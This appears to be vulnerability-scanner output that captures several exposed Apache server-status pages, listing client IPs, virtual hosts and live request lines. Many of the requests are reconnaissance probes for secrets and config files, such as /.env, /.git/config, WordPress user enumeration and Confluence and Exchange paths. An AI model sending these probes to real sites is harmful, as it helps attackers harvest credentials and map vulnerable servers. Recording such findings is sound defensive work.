143.110.218.229http/1.1trmm.us:443GET /.env HTTP/1.1 0-0942940/394/37169_ 70.98107107440.04.80795.02 71.218.187.54http/1.1trmm.us:443POST /s/ HTTP/1.1 0-0942940/384/37222_ 71.054566860.010.20829.78 76.168.201.207http/1.1trmm.us:443POST /s/ HTTP/1.1 0-0942940/393/37352_ 71.0449140.05.42797.46 96.7.74.175http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 0-0942940/383/37178_ 70.668170.012.09822.90 127.0.0.1http/1.1 1-0332380/658/33272_ 197.2912190.011.60816.73 23.35.71.87http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0332380/651/33043_ 196.9631200.09.69788.57 135.125.246.110http/1.1localhost:80POST / HTTP/1.1 1-0332380/642/33169_ 196.521301220.012.66760.20 127.0.0.1http/1.1 1-0332380/641/33160_ 196.6431200.010.75799.49 135.125.246.110http/1.1 1-0332380/642/33176_ 196.95320150.017.38826.54 23.205.108.69http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0332380/628/33037_ 197.32500.014.79803.01 96.7.74.198http/1.1trmm.us:443GET /debug/default/view?panel=config HTTP/1.1 1-0332380/644/33107_ 197.1215700.014.26778.13 127.0.0.1http/1.1localhost:443GET /dynatraceApacheQueuingTimeCheck?timestamp=29026653309894 H 1-0332380/624/32995_ 197.0621320.014.29774.58 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 1-0332380/642/33061_ 196.721571380.07.54729.36 127.0.0.1http/1.1 1-0332380/631/33107_ 197.1810821130.025.37893.58 174.84.123.196http/1.1trmm.us:443POST /s/ HTTP/1.1 1-0332380/661/33242_ 197.32500.015.23832.85 104.248.140.11http/1.1trmm.us:80GET /config.json HTTP/1.1 1-0332380/670/33080_ 197.15125270.024.70791.66 96.7.74.175http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0332380/643/32999_ 197.15130120.08.88777.40 96.7.74.175http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 1-0332380/620/33091_ 196.95325140.016.47810.37 23.220.96.151http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 1-0332380/638/33041_ 197.32000.016.25856.57 96.7.74.175http/1.1trmm.us:80GET /.git/config HTTP/1.1 1-0332380/647/33145_ 197.2095770.012.33732.34 165.254.96.20http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0332380/652/33053_ 196.67213750.010.71792.55 127.0.0.1http/1.1 1-0332380/657/33058_ 196.8839150.06.87852.83 127.0.0.1http/1.1 2-0445130/387/34892_ 63.61000.07.38796.64 96.7.74.198http/1.1trmm.us:80GET /.env HTTP/1.1 2-0445130/385/34983_ 63.4693160.05.02813.19 96.7.74.198http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0445130/400/35014_ 63.60500.08.96879.04 143.110.218.229http/1.1trmm.us:443GET /api/search?folderIds=0 HTTP/1.1 2-0445130/386/34788_ 63.59500.08.12829.90 104.248.140.11http/1.1trmm.us:80GET /s/135323e2831313e2630323e24333/_/;/META-INF/maven/com.atla 2-0445130/381/34870_ 63.5250720.07.45795.33 23.205.108.69http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0445130/397/34964_ 63.61010.06.37843.09 96.7.74.198http/1.1trmm.us:80GET / HTTP/1.1 2-0445130/385/34938_ 63.59500.03.55800.93 104.248.140.11http/1.1trmm.us:80GET /v2/_catalog HTTP/1.1 2-0445130/380/34720_ 63.5430160.011.32764.38 23.205.108.69http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0445130/384/34961_ 63.5610800.011.64754.56 23.205.108.69http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0445130/387/34778_ 63.61000.09.30803.86 96.7.74.198http/1.1trmm.us:80GET /.DS_Store HTTP/1.1 2-0445130/367/34965_ 63.16520.02.11824.78 143.110.218.229
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31ff87c597ff87c597b616a82b
Apache Status Apache Server Status for www.trmm.us (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Sunday, 25-Dec-2022 00:42:51 UTC Restart Time: Sunday, 04-Dec-2022 23:02:10 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 20 days 1 hour 40 minutes 40 seconds Server load: 0.53 0.33 0.25 Total accesses: 4719072 - Total Traffic: 165.0 GB CPU Usage: u1151.35 s139.28 cu0 cs0 - .0744% CPU load 2.72 requests/sec - 99.8 kB/second - 36.7 kB/request 6 requests currently being processed, 174 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 087005no3yes018021 158167no8yes117071 212593no2yes117010 444247no3yes117030 517488no3yes018021 662667no3yes117012 769455no3yes117021 824218no2yes018011 9100094no2yes018011 1031275no6yes117042 Sum10035 617402410 ____________________W_______________________________W_.......... ........_________________W_______________________R____________W_ ______________________________________________________________R_ ______.......................................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-0870050/429/21440_ 55.823230.016.27670.17 2.18.255.140http/1.1 0-0870050/436/21472_ 55.94200.09.25724.50 2.18.255.105http/1.1crm.textripple.com:443GET /videos/.DS_Store HTTP/1.1 0-0870050/426/21424_ 55.90490.016.68703.91 2.18.255.105http/1.1crm.textripple.com:443GET /server-status HTTP/1.1 0-0870050/422/21473_ 55.93300.014.17691.89 2.18.255.105http/1.1crm.textripple.com:443GET /includes/.DS_Store HTTP/1.1 0-0870050/443/21638_ 55.95000.020.58729.42 2.18.255.105http/1.1localhost:80GET / HTTP/1.1 0-0870050/411/21349_ 55.95000.013.09743.71 2.18.255.105http/1.1localhost:80GET / HTTP/1.1 0-0870050/422/21524_ 55.91400.013.26667.23 2.18.255.105http/1.1crm.textripple.com:443GET /classes/.DS_Store HTTP/1.1 0-0870050/441/21469_ 55.95000.033.04722.46 2.18.255.105http/1.1trmm.us:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-0870050/430/21400_ 55.90400.08.95721.43 2.18.255.105http/1.1crm.textripple.com:443GET /.vscode/.DS_Store HTTP/1.1 0-0870050/433/21381_ 55.95000.07.82686.65 2.18.255.105http/1.1trmm.us:80GET /.git/config HTTP/1.1 0-0870050/439/21460_ 55.94300.013.10683.40 2.18.255.105http/1.1crm.textripple.com:443GET /js/.DS_Store HTTP/1.1 0-0870050/432/21358_ 55.91400.012.66709.78 45.33.108.188http/1.1client.simplismarter.com:443GET /info.php HTTP/1.1 0-0870050/434/21350_ 55.92310.012.94769.82 2.18.255.105http/1.1crm.textripple.com:443GET /dal/.DS_Store HTTP/1.1 0-0870050/438/21596_ 55.94210.017.94710.77 2.18.255.105http/1.1crm.textripple.com:443GET /mms/.DS_Store HTTP/1.1 0-0870050/442/21525_ 55.94200.014.30703.18 2.18.255.105http/1.1crm.textripple.com:443GET /test/.DS_Store HTTP/1.1 0-0870050/433/21447_ 55.92310.017.67633.17 2.18.255.105http/1.1crm.textripple.com:443GET /fieldPicker/.DS_Store HTTP/1.1 0-0870050/421/21550_ 55.94200.011.67717.86 2.18.255.105http/1.1crm.textripple.com:443GET /pdfs/.DS_Store HTTP/1.1 0-0870050/428/21432_ 55.764140.012.38641.45 45.33.108.188http/1.1 1-0581670/413/22900_ 49.58010.09.04799.10 2.18.255.73http/1.1trmm.us:80GET / HTTP/1.1 1-0581670/411/23008_ 49.61000.09.69830.75 2.18.255.73http/1.1localhost:80GET /?rest_route=/wp/v2/users/ HTTP/1.1 1-0581670/422/22898_ 49.61000.07.23817.71 2.18.255.105http/1.1trmm.us:80GET /telescope/requests HTTP/1.1 1-0581670/428/22867_ 49.58000.01.88716.53 45.33.108.188http/1.1client.simplismarter.com:443GET /pdfs/.DS_Store HTTP/1.1 1-0581670/407/22889_ 49.61000.04.98785.81 2.18.255.105http/1.1localhost:80GET /.git/config HTTP/1.1 1-0581670/422/22689_ 49.61010.025.24821.17 2.18.255.73http/1.1trmm.us:80GET /info.php HTTP/1.1 1-0581670/405/22761_ 49.600120.010.09767.25 2.18.255.105http/1.1trmm.us:80GET /server-status HTTP/1.1 1-0581670/413/22945_ 49.60010.07.21830.28 2.18.255.105http/1.1trmm.us:80GET / HTTP/1.1 1-0581670/409/22887_ 49.58010.08.07786.59 2.18.255.73http/1.1trmm.us:80GET / HTTP/1.1 1-0581670/415/22704_ 49.61000.012.81885.45 2.18.255.105http/1.1trmm.us:80GET /.env HTTP/1.1 1-0581670/414/22915_ 49.61000.012.67759.59 2.18.255.105http/1.1localhost:80GET /.env HTTP/1.1 1-0581670/408/22836_ 49.61000.04.85784.29 2.18.255.105http/1.1localhost:80GET /info.php HTTP/1.1 1-0581670/415/22891_ 49.61000.015.48847.73 2.18.255.73http/1.1localhost:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-0581670/401/22732_ 49.59000.02.59812.33 2.18.255.105http/1.1crm.sprout.online:80GET / HTTP/1.1 1-0581670/417/23005_ 49.59030.022.61745.79 45.33.108.188http/1.1client.simplismarter.com:443GET /test/.DS_Store HTTP/1.1 1-0581670/417/22855_ 49.60000.05.76707.61 2.18.255.105http/1.1trmm.us:80GET /.git/config HTTP/1.1 1-0581670/393/22783_ 49.61000.04.49796.24 2.18.255.105http/1.1trmm.us:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-0581670/406/22883_ 49.58010.02.08744.58 2.18.255.73http/1.1crm.sprout.online:443GET /api/search?folderIds=0 HTTP/1.1 2-0125930/392/21252_ 80.1588150.013.86683.57 127.0.0.1http/1.1 2-0125930/393/21217_ 80.6785180.015.09660.04 23.54.163.198http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0125930/389/21239_ 80.8111150.014.61713.43 2.18.255.73http/1.1crm.sprout.online:443GET /?rest_route=/wp/v2/users/ HTTP/1.1 2-0125930/399/21324_ 80.64117150.011.03714.79 23.56.175.53http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0125930/392/21175_ 80.77600.016.31674.05 45.33.108.188http/1.1client.simplismarter.com:80GET /?rest_route=/wp/v2/users/ HTTP/1.1 2-0125930/389/21244_ 80.82010.016.44787.69 2.18.255.73http/1.1crm.sprout.online:443GET /config.json HTTP/1.1 2-0125930/389/21226_ 80.60150790.022.90697.47 184.31.0.166http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0125930/390/21377_ 80.7053170.011.01672.29 184.31.0.223http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0125930/402/21314_ 80.7239420.020.08695.48 23.56.175.28http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0125930/387/21274_ 80.7143810.011.76693.19 96.7.74.198http/1.1crm.sprout.online:443POST /mods/aja
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31ff87c597ff87c5979aeb3a6c
Apache Status Apache Server Status for www.trmm.us (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Sunday, 25-Dec-2022 00:42:51 UTC Restart Time: Sunday, 04-Dec-2022 23:02:10 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 20 days 1 hour 40 minutes 40 seconds Server load: 0.53 0.33 0.25 Total accesses: 4719049 - Total Traffic: 165.0 GB CPU Usage: u1151.29 s139.28 cu0 cs0 - .0744% CPU load 2.72 requests/sec - 99.8 kB/second - 36.7 kB/request 2 requests currently being processed, 178 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 087005no3yes018012 158167no5yes117031 212593no2yes117010 444247no2yes018020 517488no2yes018011 662667no2yes018002 769455no2yes018011 824218no2yes018011 9100094no2yes018011 1031275no3yes018012 Sum10025 217801211 ________________________W___________________________W_.......... ........________________________________________________________ ________________________________________________________________ ______.......................................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-0870050/429/21440_ 55.823230.016.27670.17 2.18.255.140http/1.1 0-0870050/436/21472_ 55.94200.09.25724.50 2.18.255.105http/1.1crm.textripple.com:443GET /videos/.DS_Store HTTP/1.1 0-0870050/426/21424_ 55.90490.016.68703.91 2.18.255.105http/1.1crm.textripple.com:443GET /server-status HTTP/1.1 0-0870050/422/21473_ 55.93300.014.17691.89 2.18.255.105http/1.1crm.textripple.com:443GET /includes/.DS_Store HTTP/1.1 0-0870050/442/21637_ 55.88400.020.58729.42 2.18.255.105http/1.1crm.textripple.com:443GET /info.php HTTP/1.1 0-0870050/411/21349_ 55.95000.013.09743.71 2.18.255.105http/1.1localhost:80GET / HTTP/1.1 0-0870050/422/21524_ 55.91400.013.26667.23 2.18.255.105http/1.1crm.textripple.com:443GET /classes/.DS_Store HTTP/1.1 0-0870050/441/21469_ 55.95000.033.04722.46 2.18.255.105http/1.1trmm.us:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-0870050/430/21400_ 55.90400.08.95721.43 2.18.255.105http/1.1crm.textripple.com:443GET /.vscode/.DS_Store HTTP/1.1 0-0870050/432/21380_ 55.88400.07.82686.65 2.18.255.105http/1.1crm.textripple.com:443GET /telescope/requests HTTP/1.1 0-0870050/439/21460_ 55.94300.013.10683.40 2.18.255.105http/1.1crm.textripple.com:443GET /js/.DS_Store HTTP/1.1 0-0870050/432/21358_ 55.91400.012.66709.78 45.33.108.188http/1.1client.simplismarter.com:443GET /info.php HTTP/1.1 0-0870050/434/21350_ 55.92310.012.94769.82 2.18.255.105http/1.1crm.textripple.com:443GET /dal/.DS_Store HTTP/1.1 0-0870050/438/21596_ 55.94210.017.94710.77 2.18.255.105http/1.1crm.textripple.com:443GET /mms/.DS_Store HTTP/1.1 0-0870050/442/21525_ 55.94200.014.30703.18 2.18.255.105http/1.1crm.textripple.com:443GET /test/.DS_Store HTTP/1.1 0-0870050/433/21447_ 55.92310.017.67633.17 2.18.255.105http/1.1crm.textripple.com:443GET /fieldPicker/.DS_Store HTTP/1.1 0-0870050/421/21550_ 55.94200.011.67717.86 2.18.255.105http/1.1crm.textripple.com:443GET /pdfs/.DS_Store HTTP/1.1 0-0870050/428/21432_ 55.764140.012.38641.45 45.33.108.188http/1.1 1-0581670/413/22900_ 49.58010.09.04799.10 2.18.255.73http/1.1trmm.us:80GET / HTTP/1.1 1-0581670/410/23007_ 49.54200.09.69830.75 45.33.108.188http/1.1client.simplismarter.com:443GET /fieldPicker/.DS_Store HTTP/1.1 1-0581670/421/22897_ 49.57000.07.23817.71 45.33.108.188http/1.1client.simplismarter.com:443GET /mobile/.DS_Store HTTP/1.1 1-0581670/428/22867_ 49.58000.01.88716.53 45.33.108.188http/1.1client.simplismarter.com:443GET /pdfs/.DS_Store HTTP/1.1 1-0581670/406/22888_ 49.54200.04.97785.80 45.33.108.188http/1.1client.simplismarter.com:443GET /images/.DS_Store HTTP/1.1 1-0581670/421/22688_ 49.56100.025.24821.17 2.18.255.73http/1.1crm.sprout.online:443GET /s/035323e2030313e27313e223/_/;/META-INF/maven/com.atlassia 1-0581670/404/22760W 49.53000.010.08767.24 2.18.255.105http/1.1trmm.us:80GET /server-status HTTP/1.1 1-0581670/412/22944_ 49.53210.07.20830.27 45.33.108.188http/1.1client.simplismarter.com:443GET /data/.DS_Store HTTP/1.1 1-0581670/409/22887_ 49.58010.08.07786.59 2.18.255.73http/1.1trmm.us:80GET / HTTP/1.1 1-0581670/414/22703_ 49.561130.012.81885.45 2.18.255.73http/1.1crm.sprout.online:443GET /server-status HTTP/1.1 1-0581670/413/22914_ 49.54100.012.67759.59 45.33.108.188http/1.1client.simplismarter.com:443GET /js/.DS_Store HTTP/1.1 1-0581670/407/22835_ 49.54100.04.85784.29 45.33.108.188http/1.1client.simplismarter.com:443GET /includes/.DS_Store HTTP/1.1 1-0581670/414/22890_ 49.57120.015.48847.73 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 1-0581670/401/22732_ 49.59000.02.59812.33 2.18.255.105http/1.1crm.sprout.online:80GET / HTTP/1.1 1-0581670/417/23005_ 49.59030.022.61745.79 45.33.108.188http/1.1client.simplismarter.com:443GET /test/.DS_Store HTTP/1.1 1-0581670/416/22854_ 49.482710.05.76707.61 2.18.255.73http/1.1 1-0581670/392/22782_ 49.50110.04.49796.24 127.0.0.1http/1.1 1-0581670/406/22883_ 49.58010.02.08744.58 2.18.255.73http/1.1crm.sprout.online:443GET /api/search?folderIds=0 HTTP/1.1 2-0125930/392/21252_ 80.1588150.013.86683.57 127.0.0.1http/1.1 2-0125930/393/21217_ 80.6785180.015.09660.04 23.54.163.198http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0125930/389/21239_ 80.8111150.014.61713.43 2.18.255.73http/1.1crm.sprout.online:443GET /?rest_route=/wp/v2/users/ HTTP/1.1 2-0125930/399/21324_ 80.64117150.011.03714.79 23.56.175.53http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0125930/392/21175_ 80.77600.016.31674.05 45.33.108.188http/1.1client.simplismarter.com:80GET /?rest_route=/wp/v2/users/ HTTP/1.1 2-0125930/389/21244_ 80.82010.016.44787.69 2.18.255.73http/1.1crm.sprout.online:443GET /config.json HTTP/1.1 2-0125930/389/21226_ 80.60150790.022.90697.47 184.31.0.166http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0125930/390/21377_ 80.7053170.011.01672.29 184.31.0.223http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0125930/402/21314_ 80.7239420.020.08695.48 23.56.175.28http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0125930/387/21274_ 80.7143810.011.7669
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31ff87c597ff87c597d09b0791
Apache Status Apache Server Status for www.trmm.us (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Thursday, 29-Sep-2022 03:13:19 UTC Restart Time: Tuesday, 19-Jul-2022 06:05:20 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 71 days 21 hours 7 minutes 58 seconds Server load: 0.24 0.40 0.52 Total accesses: 20259912 - Total Traffic: 725.4 GB CPU Usage: u3381.15 s368.7 cu0 cs0 - .0604% CPU load 3.26 requests/sec - 122.5 kB/second - 37.5 kB/request 30 requests currently being processed, 168 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 040447no9yes513012 194454no6yes414002 251755no5yes216002 3112428no3yes315020 461164no4yes414003 546522no2yes216000 6125153no6yes216021 7110199no1yes117000 899710no0yes414000 9100664no6yes117021 1085785no2yes216000 Sum11044 301680711 R___R__R___R_____W____R_R_R_______R________R_R___________R__R_W_ _____________WW____R___W_____R________R_______R__________R____R_ ________________________WR___R___R____________R_____R___________ _R____.......................................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-0404470/371/94002R 34.08000.09.003072.14 2.18.255.73http/1.1 0-0404470/388/94023_ 34.75000.08.103027.16 2.18.255.105http/1.1localhost:80GET / HTTP/1.1 0-0404470/383/93839_ 34.77000.04.113042.70 188.166.147.46http/1.1client.simplismarter.com:443GET /pdfs/.DS_Store HTTP/1.1 0-0404470/377/93646_ 34.78000.09.853106.89 2.18.255.105http/1.1localhost:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-0404470/393/93882R 34.42010.05.439251.75 2.18.255.105http/1.1 0-0404470/381/93697_ 34.78000.07.333136.41 2.18.255.105http/1.1localhost:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-0404470/366/93812_ 34.19000.03.263033.51 2.18.255.105http/1.1 0-0404470/380/93921R 34.1701200.02.573105.31 2.18.255.105http/1.1 0-0404470/381/93924_ 34.1701120.05.553111.34 2.18.255.73http/1.1 0-0404470/389/93742_ 33.910170.017.613204.24 2.18.255.105http/1.1 0-0404470/391/93851_ 34.06000.014.032995.42 2.18.255.73http/1.1 0-0404470/370/93883R 34.29010.010.282985.04 2.18.255.73http/1.1 0-0404470/386/93863_ 34.37000.05.053027.46 2.18.255.105http/1.1 0-0404470/396/93661_ 34.33020.05.003032.88 2.18.255.105http/1.1 0-0404470/388/93927_ 34.050210.011.862988.44 2.18.255.105http/1.1 0-0404470/384/93625_ 33.93000.04.873182.69 2.18.255.105http/1.1 0-0404470/389/93794_ 33.96000.06.803015.32 2.18.255.105http/1.1 0-0404470/381/93872_ 34.78000.09.423060.00 2.18.255.73http/1.1trmm.us:80GET /.DS_Store HTTP/1.1 1-0944540/427/98988_ 86.750140.013.703174.88 2.18.255.105http/1.1 1-0944540/425/99008_ 86.3901150.018.053230.87 2.18.255.73http/1.1 1-0944540/410/98770_ 86.95000.012.153192.26 2.18.255.105http/1.1 1-0944540/418/98444_ 86.88010.014.533256.26 2.18.255.73http/1.1 1-0944540/420/98864R 86.89000.015.899440.25 2.18.255.73http/1.1 1-0944540/421/98725_ 86.490150.015.713139.65 2.18.255.73http/1.1 1-0944540/430/98937R 86.74010.05.733143.20 2.18.255.105http/1.1 1-0944540/429/99017_ 86.96000.012.173122.97 2.18.255.73http/1.1 1-0944540/429/99145R 86.740130.010.383174.74 2.18.255.105http/1.1 1-0944540/442/98816_ 86.860720.015.313112.75 2.18.255.73http/1.1 1-0944540/427/98656_ 86.810140.023.983228.60 2.18.255.105http/1.1 1-0944540/423/98986_ 86.96000.019.383343.64 2.18.255.73http/1.1 1-0944540/431/99134_ 86.96000.014.583314.31 2.18.255.73http/1.1 1-0944540/414/99182_ 86.440120.024.323260.74 2.18.255.73http/1.1 1-0944540/417/98922_ 86.750740.05.693206.38 2.18.255.73http/1.1 1-0944540/428/98749_ 86.7701590.011.119424.45 2.18.255.73http/1.1 1-0944540/434/98932R 86.761150.017.253208.65 174.211.38.70http/1.1 1-0944540/440/99071_ 86.80020.021.763257.09 2.18.255.105http/1.1 2-0517550/835/102871_ 131.041170.020.583216.97 2.18.255.105http/1.1 2-0517550/855/102726_ 130.851180.032.213162.47 2.18.255.73http/1.1 2-0517550/832/102937_ 130.571170.028.383393.79 2.18.255.56http/1.1 2-0517550/825/102950_ 131.06110.020.353177.55 2.18.255.73http/1.1 2-0517550/812/102770_ 131.02100.023.903349.39 2.18.255.105http/1.1 2-0517550/819/103075_ 131.041840.024.553310.70 2.18.255.73http/1.1 2-0517550/822/102793_ 131.28000.035.343287.32 2.18.255.105http/1.1 2-0517550/858/103204_ 130.960730.024.213330.72 2.18.255.73http/1.1 2-0517550/833/102666_ 131.14000.033.373174.36 2.18.255.73http/1.1 2-0517550/844/103060R 130.961690.025.363188.87 2.18.255.105http/1.1 2-0517550/830/102752_ 131.43000.018.393309.79 2.18.255.105http/1.1localhost:80GET /.DS_Store HTTP/1.1 2-0517550/851/102709_ 131.15090.035.193309.72 2.18.255.73http/1.1 2-0517550/830/102524_ 131.10000.020.519564.19 2.18.255.105http/1.1 2-0517550/850/102897_ 131.090110.024.783478.47 2.18.255.105http/1.1 2-0517550/828/102743_ 131.0702630.016.443323.71 2.18.255.73http/1.1 2-0517550/835/102501_ 131.070750.019.023187.48 2.18.255.73http/1.1 2-0517550/842/102544_ 131.14000.0</
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31ff87c597ff87c5977413eba3
Apache Status Apache Server Status for www.trmm.us (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Thursday, 29-Sep-2022 03:13:20 UTC Restart Time: Tuesday, 19-Jul-2022 06:05:20 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 71 days 21 hours 7 minutes 59 seconds Server load: 0.24 0.40 0.52 Total accesses: 20260028 - Total Traffic: 725.4 GB CPU Usage: u3215.85 s349.98 cu0 cs0 - .0574% CPU load 3.26 requests/sec - 122.5 kB/second - 37.5 kB/request 11 requests currently being processed, 187 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 040447no23yes1170200 194454no6yes216011 251755no1yes117010 3112428no21yes2160160 461164no11yes0180101 546522no3yes018030 6125153no5yes018050 7110199no1yes216000 899710no17yes2160170 9100664no7yes018060 1085785no6yes117060 Sum110101 111870852 _____R________________R___________R_R___________________R_______ _______R______________________________________________________R_ _______R____________W__W________________________________W_______ ______.......................................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-0404470/373/94004_ 34.92000.09.003072.15 2.18.255.105http/1.1trmm.us:80GET /.env HTTP/1.1 0-0404470/390/94025_ 34.85000.08.103027.17 2.18.255.73http/1.1crm.sprout.online:80GET /v2/_catalog HTTP/1.1 0-0404470/385/93841_ 34.80000.04.113042.70 2.18.255.105http/1.1 0-0404470/379/93648_ 34.85000.09.863106.89 2.18.255.73http/1.1crm.sprout.online:80GET /about HTTP/1.1 0-0404470/396/93885_ 34.85000.05.449251.75 188.166.147.46http/1.1client.simplismarter.com:443GET /test/.DS_Store HTTP/1.1 0-0404470/383/93699R 34.83000.07.333136.41 2.18.255.73http/1.1crm.sprout.online:80GET /debug/default/view?panel=config HTTP/1.1 0-0404470/369/93815_ 34.86000.03.273033.51 2.18.255.105http/1.1crm.textripple.com:443GET /.git/config HTTP/1.1 0-0404470/383/93924_ 34.92000.02.573105.31 2.18.255.73http/1.1trmm.us:80GET /s/32332e33362e3136322e3733/_/;/META-INF/maven/com.atlassia 0-0404470/382/93925_ 34.79000.05.553111.34 2.18.255.73http/1.1 0-0404470/390/93743_ 34.92000.017.613204.24 2.18.255.105http/1.1localhost:80GET /.DS_Store HTTP/1.1 0-0404470/396/93856_ 34.92010.014.042995.43 2.18.255.73http/1.1trmm.us:80GET / HTTP/1.1 0-0404470/372/93885_ 34.83000.010.282985.04 2.18.255.73http/1.1 0-0404470/389/93866_ 34.90010.05.063027.46 2.18.255.73http/1.1trmm.us:80GET / HTTP/1.1 0-0404470/399/93664_ 34.82000.05.003032.88 2.18.255.105http/1.1 0-0404470/392/93931_ 34.83000.011.862988.44 2.18.255.105http/1.1 0-0404470/385/93626_ 34.83000.04.873182.69 2.18.255.73http/1.1 0-0404470/391/93796_ 34.890260.06.823015.34 2.18.255.105http/1.1crm.textripple.com:443GET /server-status HTTP/1.1 0-0404470/382/93873_ 34.92000.09.423060.01 2.18.255.73http/1.1trmm.us:80GET /telescope/requests HTTP/1.1 1-0944540/427/98988_ 86.750140.013.703174.88 2.18.255.105http/1.1 1-0944540/425/99008_ 86.3901150.018.053230.87 2.18.255.105http/1.1 1-0944540/410/98770_ 86.95000.012.153192.26 2.18.255.105http/1.1 1-0944540/418/98444_ 86.88010.014.533256.26 2.18.255.73http/1.1 1-0944540/420/98864R 86.89000.015.899440.25 2.18.255.73http/1.1 1-0944540/421/98725_ 86.490150.015.713139.65 2.18.255.140http/1.1 1-0944540/430/98937_ 86.74010.05.733143.20 2.18.255.73http/1.1 1-0944540/429/99017_ 86.96000.012.173122.97 2.18.255.73http/1.1 1-0944540/429/99145_ 86.740130.010.383174.74 2.18.255.105http/1.1 1-0944540/442/98816_ 86.860720.015.313112.75 2.18.255.73http/1.1 1-0944540/427/98656_ 86.810140.023.983228.60 2.18.255.105http/1.1 1-0944540/423/98986_ 86.96000.019.383343.64 2.18.255.73http/1.1 1-0944540/431/99134_ 86.96000.014.583314.31 2.18.255.73http/1.1 1-0944540/414/99182_ 86.440120.024.323260.74 2.18.255.73http/1.1 1-0944540/418/98923_ 87.36090.05.713206.39 2.18.255.73http/1.1crm.textripple.com:443GET /?rest_route=/wp/v2/users/ HTTP/1.1 1-0944540/428/98749_ 86.7701590.011.119424.45 2.18.255.105http/1.1 1-0944540/434/98932R 86.762150.017.253208.65 174.211.38.70http/1.1 